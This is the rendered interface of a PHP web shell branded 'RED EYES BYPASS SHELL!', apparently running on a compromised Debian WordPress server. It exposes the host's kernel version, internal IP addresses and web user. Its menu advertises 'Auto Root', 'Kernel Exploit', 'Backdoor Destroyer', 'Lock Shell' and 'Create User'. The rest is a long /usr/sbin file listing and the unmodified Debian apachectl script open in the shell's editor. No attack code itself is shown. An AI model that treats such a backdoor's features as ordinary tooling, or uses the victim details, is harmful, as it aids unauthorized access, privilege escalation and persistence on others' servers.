Linux Wordpress-Salone-1 5.10.0-37-cloud-amd64 #1 SMP Debian 5.10.247-1 (2025-12-11) x86_64
Apache/2.4.67 (Debian)
: 10.0.0.5 | : 10.0.1.6
Cant Read [ /etc/named.conf ]
www-data
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
usr /
sbin /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
a2disconf
15.89
KB
-rwxr-xr-x
a2dismod
15.89
KB
-rwxr-xr-x
a2dissite
15.89
KB
-rwxr-xr-x
a2enconf
15.89
KB
-rwxr-xr-x
a2enmod
15.89
KB
-rwxr-xr-x
a2ensite
15.89
KB
-rwxr-xr-x
a2query
9.64
KB
-rwxr-xr-x
aa-remove-unknown
3
KB
-rwxr-xr-x
aa-status
34.44
KB
-rwxr-xr-x
aa-teardown
139
B
-rwxr-xr-x
accessdb
14.38
KB
-rwxr-xr-x
add-shell
915
B
-rwxr-xr-x
addgnupghome
3
KB
-rwxr-xr-x
addgroup
33.72
KB
-rwxr-xr-x
adduser
33.72
KB
-rwxr-xr-x
agetty
63.41
KB
-rwxr-xr-x
apache2
720.45
KB
-rwxr-xr-x
apache2ctl
7.06
KB
-rwxr-xr-x
apachectl
7.06
KB
-rwxr-xr-x
apparmor_parser
1.38
MB
-rwxr-xr-x
apparmor_status
34.44
KB
-rwxr-xr-x
applygnupgdefaults
2.17
KB
-rwxr-xr-x
arp
66.09
KB
-rwxr-xr-x
arpd
78.27
KB
-rwxr-xr-x
arptables
215.07
KB
-rwxr-xr-x
arptables-nft
215.07
KB
-rwxr-xr-x
arptables-nft-restore
215.07
KB
-rwxr-xr-x
arptables-nft-save
215.07
KB
-rwxr-xr-x
arptables-restore
215.07
KB
-rwxr-xr-x
arptables-save
215.07
KB
-rwxr-xr-x
badblocks
34.16
KB
-rwxr-xr-x
biosdecode
23.05
KB
-rwxr-xr-x
blkdeactivate
15.97
KB
-rwxr-xr-x
blkdiscard
34.23
KB
-rwxr-xr-x
blkid
118.26
KB
-rwxr-xr-x
blkzone
74.23
KB
-rwxr-xr-x
blockdev
66.23
KB
-rwxr-xr-x
bridge
128.43
KB
-rwxr-xr-x
capsh
30.15
KB
-rwxr-xr-x
cfdisk
102.59
KB
-rwxr-xr-x
cgdisk
210.33
KB
-rwxr-xr-x
chcpu
46.23
KB
-rwxr-xr-x
check_forensic
952
B
-rwxr-xr-x
chgpasswd
66.05
KB
-rwxr-xr-x
chmem
62.23
KB
-rwxr-xr-x
chpasswd
58.05
KB
-rwxr-xr-x
chronyd
282.89
KB
-rwxr-xr-x
chroot
46.94
KB
-rwxr-xr-x
clamd
210.26
KB
-rwxr-xr-x
clamonacc
202.25
KB
-rwxr-xr-x
cpgr
60.18
KB
-rwxr-xr-x
cppw
60.18
KB
-rwxr-xr-x
cron
54.48
KB
-rwxr-xr-x
ctrlaltdel
38.23
KB
-rwxr-xr-x
debugfs
233.66
KB
-rwxr-xr-x
delgroup
15.18
KB
-rwxr-xr-x
deluser
15.18
KB
-rwxr-xr-x
depmod
166.18
KB
-rwxr-xr-x
devlink
166.47
KB
-rwxr-xr-x
dhclient
504.7
KB
-rwxr-xr-x
dhclient-script
14.13
KB
-rwxr-xr-x
dmidecode
114.85
KB
-rwxr-xr-x
dmsetup
166.87
KB
-rwxr-xr-x
dmstats
166.87
KB
-rwxr-xr-x
dpkg-fsys-usrunmess
15.1
KB
-rwxr-xr-x
dpkg-preconfigure
3.58
KB
-rwxr-xr-x
dpkg-reconfigure
4.34
KB
-rwxr-xr-x
dumpe2fs
30.23
KB
-rwxr-xr-x
e2freefrag
14.23
KB
-rwxr-xr-x
e2fsck
339.66
KB
-rwxr-xr-x
e2image
38.23
KB
-rwxr-xr-x
e2label
110.41
KB
-rwxr-xr-x
e2mmpstatus
30.23
KB
-rwxr-xr-x
e2scrub
7.13
KB
-rwxr-xr-x
e2scrub_all
5.27
KB
-rwxr-xr-x
e2undo
22.23
KB
-rwxr-xr-x
e4crypt
26.23
KB
-rwxr-xr-x
e4defrag
34.15
KB
-rwxr-xr-x
ebtables
215.07
KB
-rwxr-xr-x
ebtables-nft
215.07
KB
-rwxr-xr-x
ebtables-nft-restore
215.07
KB
-rwxr-xr-x
ebtables-nft-save
215.07
KB
-rwxr-xr-x
ebtables-restore
215.07
KB
-rwxr-xr-x
ebtables-save
215.07
KB
-rwxr-xr-x
ethtool
520.01
KB
-rwxr-xr-x
faillock
13.99
KB
-rwxr-xr-x
fdformat
34.23
KB
-rwxr-xr-x
fdisk
150.27
KB
-rwxr-xr-x
filefrag
18.17
KB
-rwxr-xr-x
findfs
14.23
KB
-rwxr-xr-x
fixparts
74.32
KB
-rwxr-xr-x
fsck
54.27
KB
-rwxr-xr-x
fsck.cramfs
42.26
KB
-rwxr-xr-x
fsck.ext2
339.66
KB
-rwxr-xr-x
fsck.ext3
339.66
KB
-rwxr-xr-x
fsck.ext4
339.66
KB
-rwxr-xr-x
fsck.minix
122.25
KB
-rwxr-xr-x
fsfreeze
14.23
KB
-rwxr-xr-x
fstab-decode
14.16
KB
-rwxr-xr-x
fstrim
70.23
KB
-rwxr-xr-x
gdisk
210.33
KB
-rwxr-xr-x
genl
82.29
KB
-rwxr-xr-x
getcap
14.15
KB
-rwxr-xr-x
getpcaps
14.15
KB
-rwxr-xr-x
getty
63.41
KB
-rwxr-xr-x
groupadd
86.77
KB
-rwxr-xr-x
groupdel
82.58
KB
-rwxr-xr-x
groupmems
62.09
KB
-rwxr-xr-x
groupmod
90.7
KB
-rwxr-xr-x
grpck
62.02
KB
-rwxr-xr-x
grpconv
57.9
KB
-rwxr-xr-x
grpunconv
57.9
KB
-rwxr-xr-x
grub-install
1.15
MB
-rwxr-xr-x
grub-macbless
931.4
KB
-rwxr-xr-x
grub-mkconfig
8.42
KB
-rwxr-xr-x
grub-mkdevicemap
216.71
KB
-rwxr-xr-x
grub-probe
939.71
KB
-rwxr-xr-x
grub-reboot
4.73
KB
-rwxr-xr-x
grub-set-default
3.47
KB
-rwxr-xr-x
halt
1.02
MB
-rwxr-xr-x
httxt2dbm
14.16
KB
-rwxr-xr-x
hv_fcopy_daemon
14.37
KB
-rwxr-xr-x
hv_kvp_daemon
26.71
KB
-rwxr-xr-x
hv_vss_daemon
14.46
KB
-rwxr-xr-x
hwclock
102.35
KB
-rwxr-xr-x
iconvconfig
30.66
KB
-rwxr-xr-x
ifconfig
81.96
KB
-rwxr-xr-x
ifdown
86.08
KB
-rwxr-xr-x
ifquery
86.08
KB
-rwxr-xr-x
iftop
66.65
KB
-rwxr-xr-x
ifup
86.08
KB
-rwxr-xr-x
init
1.66
MB
-rwxr-xr-x
insmod
166.18
KB
-rwxr-xr-x
installkernel
2.6
KB
-rwxr-xr-x
invoke-rc.d
16.12
KB
-rwxr-xr-x
ip
617.8
KB
-rwxr-xr-x
ip6tables
215.07
KB
-rwxr-xr-x
ip6tables-apply
6.89
KB
-rwxr-xr-x
ip6tables-legacy
96.81
KB
-rwxr-xr-x
ip6tables-legacy-restore
96.81
KB
-rwxr-xr-x
ip6tables-legacy-save
96.81
KB
-rwxr-xr-x
ip6tables-nft
215.07
KB
-rwxr-xr-x
ip6tables-nft-restore
215.07
KB
-rwxr-xr-x
ip6tables-nft-save
215.07
KB
-rwxr-xr-x
ip6tables-restore
215.07
KB
-rwxr-xr-x
ip6tables-restore-translate
215.07
KB
-rwxr-xr-x
ip6tables-save
215.07
KB
-rwxr-xr-x
ip6tables-translate
215.07
KB
-rwxr-xr-x
ipmaddr
18.5
KB
-rwxr-xr-x
iptables
215.07
KB
-rwxr-xr-x
iptables-apply
6.89
KB
-rwxr-xr-x
iptables-legacy
96.81
KB
-rwxr-xr-x
iptables-legacy-restore
96.81
KB
-rwxr-xr-x
iptables-legacy-save
96.81
KB
-rwxr-xr-x
iptables-nft
215.07
KB
-rwxr-xr-x
iptables-nft-restore
215.07
KB
-rwxr-xr-x
iptables-nft-save
215.07
KB
-rwxr-xr-x
iptables-restore
215.07
KB
-rwxr-xr-x
iptables-restore-translate
215.07
KB
-rwxr-xr-x
iptables-save
215.07
KB
-rwxr-xr-x
iptables-translate
215.07
KB
-rwxr-xr-x
iptunnel
26.49
KB
-rwxr-xr-x
isosize
30.23
KB
-rwxr-xr-x
killall5
26.23
KB
-rwxr-xr-x
ldattach
34.23
KB
-rwxr-xr-x
ldconfig
967.79
KB
-rwxr-xr-x
locale-gen
1.5
KB
-rwxr-xr-x
logrotate
98.09
KB
-rwxr-xr-x
logsave
14
KB
-rwxr-xr-x
losetup
110.34
KB
-rwxr-xr-x
lsmod
166.18
KB
-rwxr-xr-x
make-ssl-cert
6.65
KB
-rwxr-xr-x
mii-tool
27
KB
-rwxr-xr-x
mke2fs
138.47
KB
-rwxr-xr-x
mkfs
14.23
KB
-rwxr-xr-x
mkfs.bfs
34.23
KB
-rwxr-xr-x
mkfs.cramfs
42.16
KB
-rwxr-xr-x
mkfs.ext2
138.47
KB
-rwxr-xr-x
mkfs.ext3
138.47
KB
-rwxr-xr-x
mkfs.ext4
138.47
KB
-rwxr-xr-x
mkfs.minix
110.23
KB
-rwxr-xr-x
mkhomedir_helper
22.02
KB
-rwxr-xr-x
mkinitramfs
10.59
KB
-rwxr-xr-x
mklost+found
14.15
KB
-rwxr-xr-x
mkswap
106.23
KB
-rwxr-xr-x
modinfo
166.18
KB
-rwxr-xr-x
modprobe
166.18
KB
-rwxr-xr-x
nameif
18.68
KB
-rwxr-xr-x
newusers
94.64
KB
-rwxr-xr-x
nfnl_osf
18.15
KB
-rwxr-xr-x
nologin
14.15
KB
-rwxr-xr-x
ntpdate
79.13
KB
-rwxr-xr-x
ntpdate-debian
534
B
-rwxr-xr-x
ownership
14.29
KB
-rwxr-xr-x
pam-auth-update
20.2
KB
-rwxr-xr-x
pam_getenv
2.82
KB
-rwxr-xr-x
pam_timestamp_check
13.99
KB
-rwxr-xr-x
paperconfig
4.07
KB
-rwxr-xr-x
parted
82.09
KB
-rwxr-xr-x
partprobe
14.07
KB
-rwxr-xr-x
php-fpm7.4
4.53
MB
-rwxr-xr-x
php-fpm8.1
5.26
MB
-rwxr-xr-x
phpdismod
7.11
KB
-rwxr-xr-x
phpenmod
7.11
KB
-rwxr-xr-x
phpquery
6.24
KB
-rwxr-xr-x
pivot_root
14.23
KB
-rwxr-xr-x
plipconfig
14.42
KB
-rwxr-xr-x
poweroff
1.02
MB
-rwxr-xr-x
pwck
58.02
KB
-rwxr-xr-x
pwconv
53.89
KB
-rwxr-xr-x
pwunconv
53.9
KB
-rwxr-xr-x
qemu-make-debian-root
3.22
KB
-rwxr-xr-x
rarp
37.12
KB
-rwxr-xr-x
raw
14.23
KB
-rwxr-xr-x
readprofile
22.26
KB
-rwxr-xr-x
reboot
1.02
MB
-rwxr-xr-x
remove-shell
963
B
-rwxr-xr-x
resize2fs
62.23
KB
-rwxr-xr-x
rmmod
166.18
KB
-rwxr-xr-x
rmt
58.96
KB
-rwxr-xr-x
rmt-tar
58.96
KB
-rwxr-xr-x
route
69.13
KB
-rwxr-xr-x
rsyslogd
706.33
KB
-rwxr-xr-x
rtacct
48.29
KB
-rwxr-xr-x
rtcwake
46.23
KB
-rwxr-xr-x
rtmon
78.24
KB
-rwxr-xr-x
runlevel
1.02
MB
-rwxr-xr-x
runuser
70.23
KB
-rwxr-xr-x
service
8.88
KB
-rwxr-xr-x
setcap
14.15
KB
-rwxr-xr-x
sfdisk
142.23
KB
-rwxr-xr-x
sgdisk
202.33
KB
-rwxr-xr-x
shadowconfig
885
B
-rwxr-xr-x
shutdown
1.02
MB
-rwxr-xr-x
slattach
45.18
KB
-rwxr-xr-x
split-logfile
2.36
KB
-rwxr-xr-x
sshd
867.63
KB
-rwxr-xr-x
start-stop-daemon
43.2
KB
-rwxr-xr-x
sudo_logsrvd
179.47
KB
-rwxr-xr-x
sudo_sendlog
143
KB
-rwxr-xr-x
sulogin
46.23
KB
-rwxr-xr-x
swaplabel
18.23
KB
-rwxr-xr-x
swapoff
22.22
KB
-rwxr-xr-x
swapon
50.23
KB
-rwxr-xr-x
switch_root
14.23
KB
-rwxr-xr-x
sysctl
30.23
KB
-rwxr-xr-x
tarcat
936
B
-rwxr-xr-x
tc
557.91
KB
-rwxr-xr-x
tcptraceroute
1.56
KB
-rwxr-xr-x
tcptraceroute.db
1.56
KB
-rwxr-xr-x
telinit
1.02
MB
-rwxr-xr-x
tipc
126.23
KB
-rwxr-xr-x
traceroute
71.16
KB
-rwxr-xr-x
tune2fs
110.41
KB
-rwxr-xr-x
tzconfig
106
B
-rwxr-xr-x
unix_chkpwd
38
KB
-rwxr-sr-x
unix_update
38
KB
-rwxr-xr-x
update-ca-certificates
5.29
KB
-rwxr-xr-x
update-grub
64
B
-rwxr-xr-x
update-grub2
64
B
-rwxr-xr-x
update-gsfontmap
470
B
-rwxr-xr-x
update-initramfs
6.74
KB
-rwxr-xr-x
update-locale
2.99
KB
-rwxr-xr-x
update-mime
9.18
KB
-rwxr-xr-x
update-passwd
34.41
KB
-rwxr-xr-x
update-pciids
1.71
KB
-rwxr-xr-x
update-rc.d
16.92
KB
-rwxr-xr-x
update-secureboot-policy
5.13
KB
-rwxr-xr-x
useradd
139.52
KB
-rwxr-xr-x
userdel
94.7
KB
-rwxr-xr-x
usermod
135.34
KB
-rwxr-xr-x
uuidd
42.3
KB
-rwxr-xr-x
validlocale
1.73
KB
-rwxr-xr-x
vigr
68.4
KB
-rwxr-xr-x
vipw
68.4
KB
-rwxr-xr-x
visudo
230.48
KB
-rwxr-xr-x
vpddecode
14.43
KB
-rwxr-xr-x
waagent
976
B
-rwxr-xr-x
wipefs
46.23
KB
-rwxr-xr-x
xtables-legacy-multi
96.81
KB
-rwxr-xr-x
xtables-monitor
215.07
KB
-rwxr-xr-x
xtables-nft-multi
215.07
KB
-rwxr-xr-x
zic
54.56
KB
-rwxr-xr-x
zramctl
114.34
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : apachectl
#!/bin/sh # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # # Apache control script designed to allow an easy command line interface # to controlling Apache. Written by Marc Slemko, 1997/08/23 # # Heavily modified for Debian by Stefan Fritsch 2007-2010 # # The exit codes returned are: # XXX this doc is no longer correct now that the interesting # XXX functions are handled by httpd # 0 - operation completed successfully # 1 - # 2 - usage error # 3 - httpd could not be started # 4 - httpd could not be stopped # 5 - httpd could not be started during a restart # 6 - httpd could not be restarted during a restart # 7 - httpd could not be restarted during a graceful restart # 8 - configuration syntax error # # When multiple arguments are given, only the error from the _last_ # one is reported. Run "apachectl help" for usage info # ARGV="$@" # # |||||||||||||||||||| START CONFIGURATION SECTION |||||||||||||||||||| # -------------------- -------------------- # # main configuration directory if test -z "$APACHE_CONFDIR" ; then if test "${0##*apache2ctl-}" != "$0" ; then APACHE_CONFDIR="/etc/apache2-${0##*apache2ctl-}" else APACHE_CONFDIR=/etc/apache2 fi fi SUFFIX="${APACHE_CONFDIR##/etc/apache2-}" case "$SUFFIX" in /etc/apache2) SUFFIX="" ;; *) SUFFIX="@$SUFFIX" ;; esac APACHE_SYSTEMD_SERVICE="apache2$SUFFIX" # the path to the environment variable file test -z "$APACHE_ENVVARS" && APACHE_ENVVARS="$APACHE_CONFDIR/envvars" # pick up any necessary environment variables if test -f $APACHE_ENVVARS; then . $APACHE_ENVVARS fi if test "$APACHE_CONFDIR" != /etc/apache2 ; then APACHE_ARGUMENTS="-d $APACHE_CONFDIR $APACHE_ARGUMENTS" fi # the following APACHE_* variables should be set in /etc/apache2/envvars # # the path to your httpd binary, including options if necessary HTTPD=${APACHE_HTTPD:-/usr/sbin/apache2} # # a command that outputs a formatted text version of the HTML at the # url given on the command line. Designed for lynx, however other # programs may work. LYNX="${APACHE_LYNX:-www-browser -dump}" # # the URL to your server's mod_status status page. If you do not # have one, then status and fullstatus will not work. STATUSURL="${APACHE_STATUSURL:-http://localhost:80/server-status}" # # Set this variable to a command that increases the maximum # number of file descriptors allowed per child process. This is # critical for configurations that use many file descriptors, # such as mass vhosting, or a multithreaded server. ULIMIT_MAX_FILES="${APACHE_ULIMIT_MAX_FILES:-ulimit -n 8192}" # -------------------- -------------------- # |||||||||||||||||||| END CONFIGURATION SECTION |||||||||||||||||||| # Set the maximum number of file descriptors allowed per child process. if [ "x$ULIMIT_MAX_FILES" != "x" ] && [ `id -u` -eq 0 ] ; then if ! $ULIMIT_MAX_FILES ; then echo Setting ulimit failed. See README.Debian for more information. >&2 fi fi ERROR=0 if [ "x$ARGV" = "x" ] || [ "x$ARGV" = "xusage" ] || [ "x$ARGV" = "xhelp" ] || [ "x$ARGV" = "x--help" ]; then echo "Usage: $0 start|stop|restart|graceful|graceful-stop|configtest|status|fullstatus|help" >&2 echo " $0 <apache2 args>" >&2 echo " $0 -h (for help on <apache2 args>)" >&2 exit 1 fi get_status () { if ! $LYNX $STATUSURL ; then echo "'$LYNX $STATUSURL'" failed. >&2 echo Maybe you need to install a package providing www-browser or you >&2 echo need to adjust the APACHE_LYNX variable in /etc/apache2/envvars >&2 exit 1 fi } mkdir_chown () { local OWNER="$1" local DIR="$2" local STAT="$(LC_ALL=C stat -c %F:%U $DIR 2> /dev/null || true)" if [ "$STAT" = "" ] ; then local TMPNAME=$(mktemp -d $DIR.XXXXXXXXXX) || exit 1 chmod 755 $TMPNAME || exit 1 chown $OWNER $TMPNAME || exit 1 if ! mv -T $TMPNAME $DIR 2> /dev/null; then rmdir $TMPNAME # check for race with other apachectl if [ "$(LC_ALL=C stat -c %F:%U $DIR 2>/dev/null)" != "directory:$OWNER" ] then echo Cannot create $DIR with owner $OWNER. echo Please fix manually. Aborting. exit 1 fi fi elif [ "$STAT" != "directory:$OWNER" ] ; then echo $DIR already exists but is not a directory owned by $OWNER. echo Please fix manually. Aborting. exit 1 fi } [ ! -d ${APACHE_RUN_DIR:-/var/run/apache2} ] && mkdir -p ${APACHE_RUN_DIR:-/var/run/apache2} [ ! -d ${APACHE_LOCK_DIR:-/var/lock/apache2} ] && mkdir_chown ${APACHE_RUN_USER:-www-data} ${APACHE_LOCK_DIR:-/var/lock/apache2} case "$ARGV" in start) # ssl_scache shouldn't be here if we're just starting up. # (this is bad if there are several apache2 instances running) rm -f ${APACHE_RUN_DIR:-/var/run/apache2}/*ssl_scache* need_systemd=false if [ -z "$APACHE_STARTED_BY_SYSTEMD" ] ; then case "$(readlink -f /proc/1/exe)" in *systemd*) need_systemd=true ;; *) ;; esac fi if $need_systemd ; then # If running on systemd we should not start httpd without systemd # or systemd will get confused about the status of httpd. echo "Invoking 'systemctl start $APACHE_SYSTEMD_SERVICE'." echo "Use 'systemctl status $APACHE_SYSTEMD_SERVICE' for more info." systemctl start "$APACHE_SYSTEMD_SERVICE" else unset APACHE_STARTED_BY_SYSTEMD $HTTPD ${APACHE_ARGUMENTS} -k "$ARGV" fi ERROR=$? ;; stop|graceful-stop) $HTTPD ${APACHE_ARGUMENTS} -k "$ARGV" ERROR=$? ;; restart|graceful) if $HTTPD ${APACHE_ARGUMENTS} -t 2> /dev/null ; then $HTTPD ${APACHE_ARGUMENTS} -k "$ARGV" else $HTTPD ${APACHE_ARGUMENTS} -t fi ERROR=$? ;; startssl|sslstart|start-SSL) echo The startssl option is no longer supported. echo Please edit httpd.conf to include the SSL configuration settings echo and then use "apachectl start". ERROR=2 ;; configtest) $HTTPD ${APACHE_ARGUMENTS} -t ERROR=$? ;; status) get_status | awk ' /process$/ { print; exit } { print } ' ;; fullstatus) get_status ;; *) $HTTPD ${APACHE_ARGUMENTS} "$@" ERROR=$? esac if [ "$ERROR" != 0 ] ; then echo Action \'"$@"\' failed. echo The Apache error log may have more information. fi exit $ERROR
Close